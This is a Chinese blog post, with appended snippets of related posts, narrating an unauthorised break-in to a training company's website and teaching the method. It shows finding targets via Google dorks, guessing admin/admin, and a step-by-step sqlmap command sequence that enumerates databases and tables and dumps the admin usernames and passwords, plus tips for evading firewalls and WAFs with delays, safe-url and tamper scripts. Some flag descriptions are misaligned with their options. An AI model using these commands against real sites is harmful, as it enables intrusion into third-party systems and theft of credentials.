乙個管理培訓**,後台管理系統後面加個/admin就是,這麼容易就找到了後台管理,果然容易黑。後台:
不過,後台管理ui有點醜。然後輸入使用者名稱/密碼:admin/admin,就進去了。如下:
怎麼搞de呢,首先我們使用一些掃瞄工具掃瞄可sql注入的站點(搜尋關鍵字一般都是inurl:.php?這類)。記下你要攻擊的站點,然後使用sqlmap:
結果:sqlmap.py -u "http://[你的站點網域名稱]/about.php?id=1*" --batch //*表示由sqlmap自動掃瞄注入點 --batch表示由sqlmap預設選擇提示。
複製**
一步一步來,使用sqlmap:
結果:sqlmap.py -u "http://[你的站點網域名稱]/about.php?id=1*" --batch --current-db //檢視當前使用的資料庫
複製**
資料庫:sailodln_main,記住了。繼續來:
結果:sqlmap.py -u "http://[你的站點網域名稱]/about.php?id=1*" --batch -d sailodln_main --tables //檢視當前資料庫的所有表
複製**
一般管理員使用者名稱密碼可能在有admin字樣的表中吧。
結果:sqlmap.py -u "http://[你的站點網域名稱]/about.php?id=1*" --batch -d sailodln_main -t v_admin --columns //檢視v_admin表的所有字段
複製**
把這兩個欄位的內容dump出excel:
結果:sqlmap.py -u "http://[你的站點網域名稱]/about.php?id=1*" --batch -d sailodln_main -t v_admin -c name,pwd --dump
複製**
ok,拿到管理員賬戶和密碼,而且居然也還是明文儲存的,這程式設計師可以拿來祭天了吧,應該。 接下裡,人道主義:
最後,說說關於sqlmap,我的一些總結:
複製**忽略https:
使用多執行緒加快速度:--force-ssl
複製**
偽靜態頁面 有些web伺服器進行了url rewrite或者**是偽靜態的(*.html),無法直接提供測試引數,這樣子可以使用 * 來代替要測試的引數。--threads=0~10
複製**
請求延時 在注入過程中請求太頻繁的話可能會被防火牆攔截,這時候--delay引數就起作用了。可以設定兩次http請求間的延時。有的web程式會在多次錯誤訪問後遮蔽所有請求,這樣就導致之後所有的測試無法進行,繞過這個策略可以使用--safe-url,每隔一段時間去訪問乙個正常的頁面。
使用google搜尋 sqlmap可以測試google搜尋結果中的sql注入,很強大的功能吧。使用方法是引數-g。不過感覺實際使用中這個用的還是很少的。
post注入 有兩種方法來進行post注入,一種是使用--data引數,將post的key和value用類似get方式來提交。二是使用-r引數,sqlmap讀取使用者抓到的post請求包,來進行post注入檢測。
檢視payload 使用-v 3就可以顯示注入的payload,4,5,6還可以顯示http請求,http響應頭和頁面。
tamper 如"space2morehash.py" ,呼叫指令碼對payload進行偽裝,可用於防止waf等攔截。
注:
SQL注入之Sqlmap使用
我們都知道,對於網路滲透最重要的一步是要拿到後台資料庫管理員的密碼與使用者名稱,那麼怎麼得到這個使用者名稱和密碼呢?就要用到今天所說的sqlmap,它不僅適用於內網環境,在外網環境也是非常受歡迎的,並且在kali linux裡邊顯得尤為重要,它所到之處幾乎是 寸草不生 那麼接下來我就簡單介紹下sql...
SqlMap SQL注入之初體驗
sqlmap sql注入之初體驗 乙個管理培訓 後台管理系統後面加個 admin就是,這麼容易就找到了後台管理,果然容易黑。後台 不過,後台管理ui有點醜。然後輸入使用者名稱 密碼 admin admin,就進去了。如下 怎麼搞de呢,首先我們使用一些掃瞄工具 掃瞄可sql注入的站點 搜尋關鍵字一般...
sql注入檢測工具之sqlmap
一 sqlmap可檢測 一 判斷被測url的引數是否存在注入點 二 獲取資料庫系統的所有資料庫名稱 暴庫 三 獲取web應用當前所連線的資料庫 四 獲取web應用當前所操作的dbms使用者 五 列出資料庫中的所有使用者 六 列出資料庫中所有賬戶 對應的密碼雜湊 七 列出指定資料庫中的所有資料表 八 ...